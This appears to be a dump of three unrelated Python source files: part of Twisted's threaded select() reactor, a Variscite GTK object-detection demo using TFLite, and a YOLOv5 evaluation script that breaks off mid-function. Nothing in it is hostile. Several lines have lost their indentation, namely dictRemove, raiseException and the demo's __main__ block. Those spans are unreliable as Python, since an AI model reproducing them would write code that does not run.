In order for Twisted to do its work in the main thread (the thread that
interleave is called from), a waker function is necessary. The waker function
will be called from a "background" thread with one argument: func.
The waker function's purpose is to call func() from the main thread.
Many GUI toolkits ship with appropriate waker functions.
Some examples of this are wxPython's wx.callAfter (may be wxCallAfter in
older versions of wxPython) or PyObjC's PyObjCTools.AppHelper.callAfter.
These would be used in place of "foreignEventLoopWakerFunction" in the above
example.
The other integration point at which the foreign event loop and this reactor
must integrate is shutdown. In order to ensure clean shutdown of Twisted,
you must allow for Twisted to come to a complete stop before quitting the
application. Typically, you will do this by setting up an after shutdown
trigger to stop your foreign event loop, and call reactor.stop() where you
would normally have initiated the shutdown procedure for the foreign event
loop. Shutdown functions that could be used in place of
"foreignEventloopStop" would be the ExitMainLoop method of the wxApp instance
with wxPython, or the PyObjCTools.AppHelper.stopEventLoop function.
"""
from threading import Thread
from Queue import Queue, Empty
from time import sleep
import sys
from zope.interface import implements
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import error
from twisted.internet import posixbase
from twisted.python import log, failure, threadable
from twisted.persisted import styles
from twisted.python.runtime import platformType
import select
from errno import EINTR, EBADF
from twisted.internet.selectreactor import _select
# Exceptions that doSelect might return frequently
_NO_FILENO = error.ConnectionFdescWentAway('Handler has no fileno method')
_NO_FILEDESC = error.ConnectionFdescWentAway('Filedescriptor went away')
def dictRemove(dct, value):
try:
del dct[value]
except KeyError:
pass
def raiseException(e):
raise e
class ThreadedSelectReactor(posixbase.PosixReactorBase):
    """A threaded select() based reactor - runs on all POSIX platforms and on
    Win32.

    The blocking select() call runs in a background worker thread; the
    worker posts ('Notify', r, w) or ('Failure', f) messages back to the
    main thread via ``toMainThread``, where they are dispatched to the
    matching ``_process_*`` method.  (Python 2 era code: ``Queue`` module,
    old-style except syntax, ``zope.interface.implements``.)
    """
    implements(IReactorFDSet)
    def __init__(self):
        threadable.init(1)
        # Selectables registered for read/write interest (dicts used as sets;
        # only mutated from the worker thread via _sendToThread).
        self.reads = {}
        self.writes = {}
        # Work items (fn, args) destined for the worker thread.
        self.toThreadQueue = Queue()
        # Messages (msg, args) destined for the main thread.
        self.toMainThread = Queue()
        self.workerThread = None
        # Callable supplied by a foreign event loop (see interleave()).
        self.mainWaker = None
        posixbase.PosixReactorBase.__init__(self)
        self.addSystemEventTrigger('after', 'shutdown', self._mainLoopShutdown)
    def wakeUp(self):
        """Wake the reactor; safe to call from any thread."""
        # we want to wake up from any thread
        self.waker.wakeUp()
    def callLater(self, *args, **kw):
        """Schedule a delayed call, then wake the reactor so the pending
        select() picks up the new timeout."""
        tple = posixbase.PosixReactorBase.callLater(self, *args, **kw)
        self.wakeUp()
        return tple
    def _sendToMain(self, msg, *args):
        """Post a (msg, args) message to the main thread and trigger its
        waker, if one is installed."""
        #print >>sys.stderr, 'sendToMain', msg, args
        self.toMainThread.put((msg, args))
        if self.mainWaker is not None:
            self.mainWaker()
    def _sendToThread(self, fn, *args):
        """Queue fn(*args) for execution in the worker thread."""
        #print >>sys.stderr, 'sendToThread', fn, args
        self.toThreadQueue.put((fn, args))
    def _preenDescriptorsInThread(self):
        """Drop descriptors that select() can no longer handle.

        Runs in the worker thread: probes each registered selectable with a
        zero-timeout select() and re-registers only the ones that do not
        raise.
        """
        log.msg("Malformed file descriptor found. Preening lists.")
        readers = self.reads.keys()
        writers = self.writes.keys()
        self.reads.clear()
        self.writes.clear()
        for selDict, selList in ((self.reads, readers), (self.writes, writers)):
            for selectable in selList:
                try:
                    # Probe the lone descriptor; a bad fd raises immediately.
                    select.select([selectable], [selectable], [selectable], 0)
                except:
                    log.msg("bad descriptor %s" % selectable)
                else:
                    selDict[selectable] = 1
    def _workerInThread(self):
        """Worker thread main loop: execute queued (fn, args) items until a
        SystemExit is delivered (see _mainLoopShutdown); any other exception
        is forwarded to the main thread as a Failure."""
        try:
            while 1:
                fn, args = self.toThreadQueue.get()
                #print >>sys.stderr, "worker got", fn, args
                fn(*args)
        except SystemExit:
            pass # exception indicates this thread should exit
        except:
            f = failure.Failure()
            self._sendToMain('Failure', f)
        #print >>sys.stderr, "worker finished"
    def _doSelectInThread(self, timeout):
        """Run one iteration of the I/O monitor loop.
        This will run all selectables who had input or output readiness
        waiting for them.
        """
        reads = self.reads
        writes = self.writes
        while 1:
            try:
                r, w, ignored = _select(reads.keys(),
                                        writes.keys(),
                                        [], timeout)
                break
            except ValueError, ve:
                # Possibly a file descriptor has gone negative?
                log.err()
                self._preenDescriptorsInThread()
            except TypeError, te:
                # Something *totally* invalid (object w/o fileno, non-integral
                # result) was passed
                log.err()
                self._preenDescriptorsInThread()
            except (select.error, IOError), se:
                # select(2) encountered an error
                if se.args[0] in (0, 2):
                    # windows does this if it got an empty list
                    if (not reads) and (not writes):
                        return
                    else:
                        raise
                elif se.args[0] == EINTR:
                    return
                elif se.args[0] == EBADF:
                    self._preenDescriptorsInThread()
                else:
                    # OK, I really don't know what's going on. Blow up.
                    raise
        # Hand the ready sets back to the main thread for dispatching.
        self._sendToMain('Notify', r, w)
    def _process_Notify(self, r, w):
        """Main-thread handler for a 'Notify' message: run doRead/doWrite on
        every ready selectable that is still registered."""
        #print >>sys.stderr, "_process_Notify"
        reads = self.reads
        writes = self.writes
        _drdw = self._doReadOrWrite
        _logrun = log.callWithLogger
        for selectables, method, dct in ((r, "doRead", reads), (w, "doWrite", writes)):
            for selectable in selectables:
                # if this was disconnected in another thread, kill it.
                if selectable not in dct:
                    continue
                # This for pausing input when we're not ready for more.
                _logrun(selectable, _drdw, selectable, method, dct)
        #print >>sys.stderr, "done _process_Notify"
    def _process_Failure(self, f):
        # Re-raise an exception that escaped the worker thread.
        f.raiseException()
    _doIterationInThread = _doSelectInThread
    def ensureWorkerThread(self):
        """Start the worker thread if it is not already alive."""
        if self.workerThread is None or not self.workerThread.isAlive():
            self.workerThread = Thread(target=self._workerInThread)
            self.workerThread.start()
    def doThreadIteration(self, timeout):
        """One reactor iteration: queue a select() for the worker thread,
        then block until any message comes back and dispatch it."""
        self._sendToThread(self._doIterationInThread, timeout)
        self.ensureWorkerThread()
        #print >>sys.stderr, 'getting...'
        msg, args = self.toMainThread.get()
        #print >>sys.stderr, 'got', msg, args
        getattr(self, '_process_' + msg)(*args)
    doIteration = doThreadIteration
    def _interleave(self):
        """Generator that drives the reactor when embedded in a foreign
        event loop; each resumption (via mainWaker) processes one message
        posted by the worker thread."""
        while self.running:
            #print >>sys.stderr, "runUntilCurrent"
            self.runUntilCurrent()
            t2 = self.timeout()
            # While running, wait up to the next scheduled-call timeout.
            t = self.running and t2
            self._sendToThread(self._doIterationInThread, t)
            #print >>sys.stderr, "yielding"
            yield None
            #print >>sys.stderr, "fetching"
            # We were resumed because _sendToMain fired the waker, so a
            # message must be waiting.
            msg, args = self.toMainThread.get_nowait()
            getattr(self, '_process_' + msg)(*args)
    def interleave(self, waker, *args, **kw):
        """
        interleave(waker) interleaves this reactor with the
        current application by moving the blocking parts of
        the reactor (select() in this case) to a separate
        thread. This is typically useful for integration with
        GUI applications which have their own event loop
        already running.
        See the module docstring for more information.
        """
        self.startRunning(*args, **kw)
        loop = self._interleave()
        def mainWaker(waker=waker, loop=loop):
            # Ask the foreign loop to resume our generator in its thread.
            #print >>sys.stderr, "mainWaker()"
            waker(loop.next)
        self.mainWaker = mainWaker
        # Prime the generator up to its first yield.
        loop.next()
        self.ensureWorkerThread()
    def _mainLoopShutdown(self):
        """'after shutdown' trigger: stop the worker thread via SystemExit,
        drain both queues, and run any still-pending non-iteration work."""
        self.mainWaker = None
        if self.workerThread is not None:
            #print >>sys.stderr, 'getting...'
            self._sendToThread(raiseException, SystemExit)
            self.wakeUp()
            try:
                while 1:
                    msg, args = self.toMainThread.get_nowait()
                    #print >>sys.stderr, "ignored:", (msg, args)
            except Empty:
                pass
            self.workerThread.join()
            self.workerThread = None
            try:
                while 1:
                    fn, args = self.toThreadQueue.get_nowait()
                    if fn is self._doIterationInThread:
                        log.msg('Iteration is still in the thread queue!')
                    elif fn is raiseException and args[0] is SystemExit:
                        pass
                    else:
                        fn(*args)
            except Empty:
                pass
    def _doReadOrWrite(self, selectable, method, dict):
        """Invoke selectable.doRead/doWrite and disconnect the selectable if
        the call returns a reason or its descriptor has gone away."""
        try:
            why = getattr(selectable, method)()
            handfn = getattr(selectable, 'fileno', None)
            if not handfn:
                why = _NO_FILENO
            elif handfn() == -1:
                why = _NO_FILEDESC
        except:
            why = sys.exc_info()[1]
            log.err()
        if why:
            self._disconnectSelectable(selectable, why, method == "doRead")
    def addReader(self, reader):
        """Add a FileDescriptor for notification of data available to read.
        """
        # Registration happens in the worker thread to avoid races with
        # the select() that is using the dicts.
        self._sendToThread(self.reads.__setitem__, reader, 1)
        self.wakeUp()
    def addWriter(self, writer):
        """Add a FileDescriptor for notification of data available to write.
        """
        self._sendToThread(self.writes.__setitem__, writer, 1)
        self.wakeUp()
    def removeReader(self, reader):
        """Remove a Selectable for notification of data available to read.
        """
        self._sendToThread(dictRemove, self.reads, reader)
    def removeWriter(self, writer):
        """Remove a Selectable for notification of data available to write.
        """
        self._sendToThread(dictRemove, self.writes, writer)
    def removeAll(self):
        """Remove all registered readers/writers and return them."""
        return self._removeAll(self.reads, self.writes)
    def run(self, installSignalHandlers=1):
        """Start the reactor and block in mainLoop() until shutdown."""
        self.startRunning(installSignalHandlers=installSignalHandlers)
        self.mainLoop()
    def mainLoop(self):
        """Standalone main loop: drive interleave() with a private queue,
        executing each queued callable; StopIteration from the exhausted
        _interleave generator ends the loop."""
        q = Queue()
        self.interleave(q.put)
        while self.running:
            try:
                q.get()()
            except StopIteration:
                break
def install():
    """Create a ThreadedSelectReactor and install it as the global Twisted
    reactor.

    :return: the newly installed reactor instance.
    """
    from twisted.internet.main import installReactor
    threadedReactor = ThreadedSelectReactor()
    installReactor(threadedReactor)
    return threadedReactor
__all__ = ['install']
|
ui_detection.py | # Copyright 2021 Variscite LTD
# SPDX-License-Identifier: BSD-3-Clause
import cv2
import numpy as np
import threading
import gi
gi.require_versions({'GdkPixbuf': "2.0", 'Gtk': "3.0"})
from gi.repository.GdkPixbuf import Colorspace, Pixbuf
from gi.repository import GLib, Gtk
from pyvar.ml.engines.tflite import TFLiteInterpreter
from pyvar.ml.utils.framerate import Framerate
from pyvar.ml.utils.label import Label
from pyvar.ml.utils.overlay import Overlay
from pyvar.ml.utils.resizer import Resizer
from pyvar.ml.utils.retriever import FTP
from pyvar.multimedia.helper import Multimedia
# The 80 COCO object labels recognized by the SSD detection model.  Used as
# the initial exclusion list (everything excluded until switched on in the
# ObjectSelection page).
SSD_LABELS_LIST = [
    "person", "bicycle", "car", "motorcycle", "airplane", "bus", "train",
    "truck", "boat", "traffic light", "fire hydrant", "stop sign",
    "parking meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow",
    "elephant", "bear", "zebra", "giraffe", "backpack", "umbrella", "handbag",
    "tie", "suitcase", "frisbee", "skis", "snowboard", "sports ball", "kite",
    "baseball bat", "baseball glove", "skateboard", "surfboard",
    "tennis racket", "bottle", "wine glass", "cup", "fork", "knife", "spoon",
    "bowl", "banana", "apple", "sandwich", "orange", "broccoli", "carrot",
    "hot dog", "pizza", "donut", "cake", "chair", "couch", "potted plant",
    "bed", "dining table", "toilet", "tv", "laptop", "mouse", "remote",
    "keyboard", "cell phone", "microwave", "oven", "toaster", "sink",
    "refrigerator", "book", "clock", "vase", "scissors", "teddy bear",
    "hair drier", "toothbrush"]
class ObjectSelection(Gtk.Frame):
    """Settings page listing every label with an on/off switch.

    A label whose switch is ON is removed from the shared ``exclude_list``
    (so the detection page will display it); switching it OFF puts the
    label back into the exclusion list.
    """

    def __init__(self, parent, exclude_list):
        super().__init__()
        self.parent = parent
        self.exclude_list = exclude_list
        sorted_labels = sorted(self.exclude_list)

        outer_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.add(outer_box)
        scrolled_window = Gtk.ScrolledWindow()

        # Back/Quit control row on top, scrollable switch list below.
        controls_row = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        quit_button = Gtk.Button.new_with_label('Quit')
        quit_button.connect('clicked', self.on_quit_button_clicked)
        back_button = Gtk.Button.new_with_label('Back')
        back_button.connect('clicked', self.on_back_button_clicked)
        controls_row.pack_start(back_button, True, True, 10)
        controls_row.pack_start(quit_button, True, True, 10)
        outer_box.pack_start(controls_row, False, True, 10)
        outer_box.pack_start(scrolled_window, True, True, 10)

        list_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        scrolled_window.add(list_box)
        for label in sorted_labels:
            row = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
            switch_button = Gtk.Switch()
            switch_button.set_active(False)
            switch_button.connect('notify::active',
                                  self.on_object_switch_activated, label)
            row.pack_start(Gtk.Label.new(label), True, True, 100)
            row.pack_start(switch_button, False, True, 100)
            list_box.pack_start(row, True, True, 10)

    def on_quit_button_clicked(self, button):
        """Terminate the GTK main loop."""
        Gtk.main_quit()

    def on_back_button_clicked(self, button):
        """Return to the real-time detection page (notebook page 0)."""
        self.parent.set_current_page(0)

    def on_object_switch_activated(self, switch, gparam, obj):
        """Toggle membership of *obj* in the shared exclusion list."""
        if switch.get_active():
            if obj in self.exclude_list:
                self.exclude_list.remove(obj)
        else:
            if obj not in self.exclude_list:
                self.exclude_list.append(obj)
class RealTimeDetection(Gtk.Frame):
    """Notebook page running SSD object detection on a live camera feed.

    Model and labels are fetched via FTP at construction time; inference
    runs in a daemon thread (image_detection) and all widget updates are
    marshaled onto the GTK main loop with GLib.idle_add.
    """
    def __init__(self, parent, exclude_list):
        super().__init__()
        self.parent = parent
        # Shared with ObjectSelection: detections whose label is in this
        # list are suppressed.
        self.exclude_list = exclude_list
        self.model_file_path = None
        self.label_file_path = None
        ftp = FTP()
        # NOTE(review): if retrieve_package() fails, both paths stay None
        # and Label()/TFLiteInterpreter() below receive None -- confirm
        # intended failure behavior.
        if ftp.retrieve_package(category="detection"):
            self.model_file_path = ftp.model
            self.label_file_path = ftp.label
        labels = Label(self.label_file_path)
        labels.read_labels("detection")
        self.labels = labels.list
        self.engine = None
        self.interpreter = None
        self.input_details = None
        self.output_details = None
        self.pixbuf = None
        # --- UI layout: button row, camera image, stats row ---
        vertical_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        self.add(vertical_box)
        horizontal_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        quit_button = Gtk.Button.new_with_label('Quit')
        quit_button.connect('clicked', self.on_quit_button_clicked)
        objects_button = Gtk.Button.new_with_label('Objects')
        objects_button.connect('clicked', self.on_objects_button_clicked)
        horizontal_box.pack_start(objects_button, True, True, 10)
        horizontal_box.pack_start(quit_button, True, True, 10)
        vertical_box.pack_start(horizontal_box, True, False, 10)
        self.displayed_image = Gtk.Image()
        image_box = Gtk.Box(spacing=5)
        image_box.pack_start(self.displayed_image, True, True, 0)
        vertical_box.pack_start(image_box, True, True, 5)
        horizontal_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        inference_time_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        inference_label = Gtk.Label()
        inference_label.set_markup('INFERENCE TIME:')
        self.inference_value_label = Gtk.Label.new(None)
        inference_time_box.pack_start(inference_label, False, True, 10)
        inference_time_box.pack_start(self.inference_value_label, False, False, 10)
        fps_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
        fps_label = Gtk.Label()
        fps_label.set_markup('FPS:')
        self.fps_value_label = Gtk.Label.new(None)
        fps_box.pack_start(fps_label, False, True, 10)
        fps_box.pack_start(self.fps_value_label, False, False, 10)
        horizontal_box.pack_start(inference_time_box, True, True, 10)
        horizontal_box.pack_start(fps_box, True, True, 10)
        vertical_box.pack_start(horizontal_box, True, False, 10)
        # Engine must exist before the detection thread starts using it.
        self.start_interpreter()
        self.run_application()
    def on_quit_button_clicked(self, button):
        # Stop the GTK main loop.
        Gtk.main_quit()
    def on_objects_button_clicked(self, button):
        # Jump to the object-selection page (notebook page 1).
        self.parent.set_current_page(1)
    def set_displayed_image(self, image):
        """Convert an OpenCV frame to a Pixbuf and display it.

        Runs on the GTK main loop (scheduled via GLib.idle_add).
        """
        image = cv2.resize(image, (420, 340))
        # Swap R and B channels so the buffer matches the Pixbuf's
        # Colorspace.RGB layout below.
        image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
        height, width = image.shape[:2]
        arr = np.ndarray.tobytes(image)
        self.pixbuf = Pixbuf.new_from_data(
            arr, Colorspace.RGB, False, 8,
            width, height, width*3, None, None)
        self.displayed_image.set_from_pixbuf(self.pixbuf)
        self.pixbuf = None
    def run_application(self):
        # Run the camera/inference loop off the GTK main thread.
        thread = threading.Thread(target=self.image_detection)
        thread.daemon = True
        thread.start()
    def start_interpreter(self):
        # Build the TFLite engine from the downloaded model file.
        self.engine = TFLiteInterpreter(self.model_file_path)
    def image_detection(self):
        """Capture/inference loop (runs in a daemon thread)."""
        resizer = Resizer()
        resizer.set_sizes(engine_input_details=self.engine.input_details)
        # assumes the camera is at /dev/video1 -- TODO confirm on target HW
        camera = Multimedia("/dev/video1", resolution="vga")
        camera.set_v4l2_config()
        framerate = Framerate()
        draw = Overlay()
        draw.inference_time_info = False
        draw.scores_info = True
        draw.extra_info = False
        draw.framerate_info = False
        while camera.loop:
            with framerate.fpsit():
                frame = camera.get_frame()
                resizer.resize_frame(frame)
                self.engine.set_input(resizer.frame_resized)
                self.engine.run_inference()
                # SSD post-processed outputs: boxes, class ids, scores.
                positions = self.engine.get_output(0, squeeze=True)
                classes = self.engine.get_output(1, squeeze=True)
                scores = self.engine.get_output(2, squeeze=True)
                result = []
                # Keep detections above 0.5 confidence whose label is not
                # excluded via the ObjectSelection page.
                for idx, score in enumerate(scores):
                    if score > 0.5 and (self.labels[classes[idx]] not in self.exclude_list):
                        result.append({'pos': positions[idx], '_id': classes[idx]})
                output_frame = draw.info(category="detection",
                                         image=resizer.frame,
                                         top_result=result,
                                         labels=self.labels,
                                         inference_time=None,
                                         model_name=None,
                                         source_file=camera.dev.name,
                                         fps=None)
                # All widget updates must happen on the GTK main loop.
                GLib.idle_add(self.inference_value_label.set_text,
                              f"{self.engine.inference_time}")
                GLib.idle_add(self.fps_value_label.set_text,
                              f"{int(framerate.fps)}")
                GLib.idle_add(self.set_displayed_image, output_frame)
class UserInterfaceDetectionExample(Gtk.Window):
    """Top-level fullscreen window hosting the two notebook pages.

    Page 0 is the live detection view; page 1 is the label-selection
    view.  Both share one mutable exclusion list.
    """

    def __init__(self):
        super().__init__(title='User Interface Detection Example')
        self.fullscreen()
        # Every label starts excluded; the selection page removes entries
        # as switches are turned on.
        exclude_list = SSD_LABELS_LIST.copy()
        notebook = Gtk.Notebook()
        notebook.set_show_tabs(False)
        self.add(notebook)
        notebook.append_page(RealTimeDetection(notebook, exclude_list))
        notebook.append_page(ObjectSelection(notebook, exclude_list))
if __name__ == "__main__":
app = UserInterfaceDetectionExample()
app.connect('delete-event', Gtk.main_quit)
app.show_all()
Gtk.main()
|
test.py | import argparse
import glob
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, box_iou, \
non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path
from utils.loss import compute_loss
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
         weights=None,
         batch_size=32,
         imgsz=640,
         conf_thres=0.001,
         iou_thres=0.6, # for NMS
         save_json=False,
         single_cls=False,
         augment=False,
         verbose=False,
         model=None,
         dataloader=None,
         save_dir=Path(''), # for saving images
         save_txt=False, # for auto-labelling
         save_conf=False,
         plots=True,
         log_imgs=0): # number of logged images
    """Evaluate a YOLO detection model on a dataset and report P/R/mAP.

    Two entry modes: called from train.py with ``model`` and ``dataloader``
    supplied ("training" mode), or run standalone, in which case it reads
    device/task/save options from the module-level ``opt`` namespace
    (populated by the __main__ argparse block).

    Returns ``((mp, mr, map50, map, *mean_losses), per_class_maps, times)``.
    """
    # Initialize/load model and set device
    training = model is not None
    if training: # called by train.py
        device = next(model.parameters()).device # get model device
    else: # called directly
        set_logging()
        device = select_device(opt.device, batch_size=batch_size)
        save_txt = opt.save_txt # save *.txt labels
        # Directories
        save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
        (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
        # Load model
        model = attempt_load(weights, map_location=device) # load FP32 model
        imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
        # Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
        # if device.type != 'cpu' and torch.cuda.device_count() > 1:
        # model = nn.DataParallel(model)
    # Half
    half = device.type != 'cpu' # half precision only supported on CUDA
    if half:
        model.half()
    # Configure
    model.eval()
    is_coco = data.endswith('coco.yaml') # is COCO dataset
    with open(data) as f:
        data = yaml.load(f, Loader=yaml.FullLoader) # model dict
    check_dataset(data) # check
    nc = 1 if single_cls else int(data['nc']) # number of classes
    iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
    niou = iouv.numel()
    # Logging
    log_imgs, wandb = min(log_imgs, 100), None # ceil
    try:
        import wandb # Weights & Biases
    except ImportError:
        log_imgs = 0
    # Dataloader
    if not training:
        img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
        _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once
        path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
        dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True)[0]
    seen = 0
    confusion_matrix = ConfusionMatrix(nc=nc)
    names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
    coco91class = coco80_to_coco91_class()
    s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
    p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
    loss = torch.zeros(3, device=device)
    jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
    for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
        img = img.to(device, non_blocking=True)
        img = img.half() if half else img.float() # uint8 to fp16/32
        img /= 255.0 # 0 - 255 to 0.0 - 1.0
        targets = targets.to(device)
        nb, _, height, width = img.shape # batch size, channels, height, width
        with torch.no_grad():
            # Run model
            t = time_synchronized()
            inf_out, train_out = model(img, augment=augment) # inference and training outputs
            t0 += time_synchronized() - t
            # Compute loss
            if training:
                loss += compute_loss([x.float() for x in train_out], targets, model)[1][:3] # box, obj, cls
            # Run NMS
            targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
            lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_txt else [] # for autolabelling
            t = time_synchronized()
            output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
            t1 += time_synchronized() - t
        # Statistics per image
        for si, pred in enumerate(output):
            labels = targets[targets[:, 0] == si, 1:]
            nl = len(labels)
            tcls = labels[:, 0].tolist() if nl else [] # target class
            path = Path(paths[si])
            seen += 1
            if len(pred) == 0:
                # No predictions: record an all-miss entry if targets exist.
                if nl:
                    stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
                continue
            # Predictions
            predn = pred.clone()
            scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
            # Append to text file
            if save_txt:
                gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
                for *xyxy, conf, cls in predn.tolist():
                    xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
                    line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
                    with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
                        f.write(('%g ' * len(line)).rstrip() % line + '\n')
            # W&B logging
            if plots and len(wandb_images) < log_imgs:
                box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
                             "class_id": int(cls),
                             "box_caption": "%s %.3f" % (names[cls], conf),
                             "scores": {"class_score": conf},
                             "domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
                boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
                wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
            # Append to pycocotools JSON dictionary
            if save_json:
                # [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
                image_id = int(path.stem) if path.stem.isnumeric() else path.stem
                box = xyxy2xywh(predn[:, :4]) # xywh
                box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
                # NOTE(review): this loop rebinds 'p' (initialized above as
                # precision); 'p' is recomputed from ap_per_class() after the
                # batch loop, so this is harmless today but fragile.
                for p, b in zip(pred.tolist(), box.tolist()):
                    jdict.append({'image_id': image_id,
                                  'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
                                  'bbox': [round(x, 3) for x in b],
                                  'score': round(p[4], 5)})
            # Assign all predictions as incorrect
            correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
            if nl:
                detected = [] # target indices
                tcls_tensor = labels[:, 0]
                # target boxes
                tbox = xywh2xyxy(labels[:, 1:5])
                scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
                if plots:
                    confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
                # Per target class
                for cls in torch.unique(tcls_tensor):
                    ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
                    pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
                    # Search for detections
                    if pi.shape[0]:
                        # Prediction to target ious
                        ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
                        # Append detections
                        detected_set = set()
                        for j in (ious > iouv[0]).nonzero(as_tuple=False):
                            d = ti[i[j]] # detected target
                            if d.item() not in detected_set:
                                detected_set.add(d.item())
                                detected.append(d)
                                correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
                                if len(detected) == nl: # all targets already located in image
                                    break
            # Append statistics (correct, conf, pcls, tcls)
            stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
        # Plot images
        if plots and batch_i < 3:
            f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
            Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
            f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
            Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
    # Compute statistics
    stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
    if len(stats) and stats[0].any():
        p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
        p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
        mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
        nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
    else:
        nt = torch.zeros(1)
    # Print results
    pf = '%20s' + '%12.3g' * 6 # print format
    print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
    # Print results per class
    if verbose and nc > 1 and len(stats):
        for i, c in enumerate(ap_class):
            print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
    # Print speeds
    t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
    if not training:
        print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
    # Plots
    if plots:
        confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
        if wandb and wandb.run:
            wandb.log({"Images": wandb_images})
            wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
    # Save JSON
    if save_json and len(jdict):
        w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
        anno_json = glob.glob('../coco/annotations/instances_val*.json')[0] # annotations json
        pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
        print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
        with open(pred_json, 'w') as f:
            json.dump(jdict, f)
        try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
            from pycocotools.coco import COCO
            from pycocotools.cocoeval import COCOeval
            anno = COCO(anno_json) # init annotations api
            pred = anno.loadRes(pred_json) # init predictions api
            # NOTE(review): 'eval' shadows the builtin within this scope.
            eval = COCOeval(anno, pred, 'bbox')
            if is_coco:
                eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
            eval.evaluate()
            eval.accumulate()
            eval.summarize()
            map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
        except Exception as e:
            print('ERROR: pycocotools unable to run: %s' % e)
    # Return results
    if not training:
        s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
        print(f"Results saved to {save_dir}{s}")
    model.float() # for training
    maps = np.zeros(nc) + map
    for i, c in enumerate(ap_class):
        maps[c] = ap[i]
